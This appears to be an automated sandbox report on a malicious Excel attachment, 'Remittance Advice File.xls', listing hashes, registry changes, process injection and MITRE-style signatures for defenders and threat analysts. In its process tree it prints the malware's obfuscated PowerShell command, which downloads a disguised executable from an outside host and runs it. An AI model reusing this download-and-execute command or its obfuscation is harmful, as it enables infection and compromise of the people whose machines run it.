Analysis
-
max time kernel
104s -
max time network
90s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
13-10-2021 16:47
Static task
static1
Behavioral task
behavioral1
Sample
Remittance Advice File.xls
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Remittance Advice File.xls
Resource
win10v20210408
General
-
Target
Remittance Advice File.xls
-
Size
73KB
-
MD5
ca027182d31698dcbb704e0d1a7c28d2
-
SHA1
628a5f48cbad45672a239e683bfc4eeadb82fbc3
-
SHA256
0e201d6a6fbac62df83faedc6af867e1b17de08220698b5f06c204ad4d936b83
-
SHA512
bbb8f18e4dbd1d67881a9c91b3da6bac785bb218dc04be3bb9f7aa7a01cd3b82d4ec234d438dd3f4bcbda44624c32535ab932321d6ca1a55e9d9bef65b0b7cfc
Malware Config
Extracted
http://thepunchlineexpose.com/Manager/AnyDesk.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 2012 360 cmd.exe EXCEL.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 360 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2008 powershell.exe 2008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2008 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
EXCEL.EXEpid process 360 EXCEL.EXE 360 EXCEL.EXE 360 EXCEL.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 360 wrote to memory of 2012 360 EXCEL.EXE cmd.exe PID 360 wrote to memory of 2012 360 EXCEL.EXE cmd.exe PID 360 wrote to memory of 2012 360 EXCEL.EXE cmd.exe PID 360 wrote to memory of 2012 360 EXCEL.EXE cmd.exe PID 2012 wrote to memory of 2008 2012 cmd.exe powershell.exe PID 2012 wrote to memory of 2008 2012 cmd.exe powershell.exe PID 2012 wrote to memory of 2008 2012 cmd.exe powershell.exe PID 2012 wrote to memory of 2008 2012 cmd.exe powershell.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Remittance Advice File.xls"1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Public\Documents\institutionsport.cmd" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://thepunchlineexpose.com/Manager/AnyDesk.e`xe -Destination C:\Users\Public\Documents\weekshe.e`xe;C:\Users\Public\Documents\weekshe.e`xe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Documents\institutionsport.cmdMD5
e623d1a58b6060f53e373dc8d9850c87
SHA15d7ca4d6ffb2c4c96615b72acbf54060765c861d
SHA25699f121fdaf92f6bfdb6af9bf6813fd10ce95b848378b964739b1ae7e667e34e9
SHA512f8ae81455e3de663d89a255b46b98d3ff01c8741d73be3413163a2743ae2e00e47ec094f253f15cd8d0fa7aba04fbc31c52c7b23350435277a0507cbaa86f74b
-
memory/360-60-0x000000002FD01000-0x000000002FD04000-memory.dmpFilesize
12KB
-
memory/360-61-0x0000000070E11000-0x0000000070E13000-memory.dmpFilesize
8KB
-
memory/360-62-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/360-109-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2008-72-0x0000000004850000-0x0000000004851000-memory.dmpFilesize
4KB
-
memory/2008-76-0x00000000056F0000-0x00000000056F1000-memory.dmpFilesize
4KB
-
memory/2008-67-0x0000000001EB0000-0x0000000001EB1000-memory.dmpFilesize
4KB
-
memory/2008-68-0x00000000048D0000-0x00000000048D1000-memory.dmpFilesize
4KB
-
memory/2008-69-0x0000000004890000-0x0000000004891000-memory.dmpFilesize
4KB
-
memory/2008-70-0x0000000004892000-0x0000000004893000-memory.dmpFilesize
4KB
-
memory/2008-71-0x00000000024D0000-0x00000000024D1000-memory.dmpFilesize
4KB
-
memory/2008-65-0x0000000000000000-mapping.dmp
-
memory/2008-75-0x000000007EF30000-0x000000007EF31000-memory.dmpFilesize
4KB
-
memory/2008-66-0x0000000075451000-0x0000000075453000-memory.dmpFilesize
8KB
-
memory/2008-81-0x0000000005640000-0x0000000005641000-memory.dmpFilesize
4KB
-
memory/2008-82-0x0000000006220000-0x0000000006221000-memory.dmpFilesize
4KB
-
memory/2008-89-0x0000000005820000-0x0000000005821000-memory.dmpFilesize
4KB
-
memory/2008-90-0x00000000062E0000-0x00000000062E1000-memory.dmpFilesize
4KB
-
memory/2008-91-0x0000000005600000-0x0000000005601000-memory.dmpFilesize
4KB
-
memory/2008-93-0x00000000063F0000-0x00000000063F1000-memory.dmpFilesize
4KB
-
memory/2008-107-0x0000000006520000-0x0000000006521000-memory.dmpFilesize
4KB
-
memory/2008-108-0x0000000006570000-0x0000000006571000-memory.dmpFilesize
4KB
-
memory/2012-63-0x0000000000000000-mapping.dmp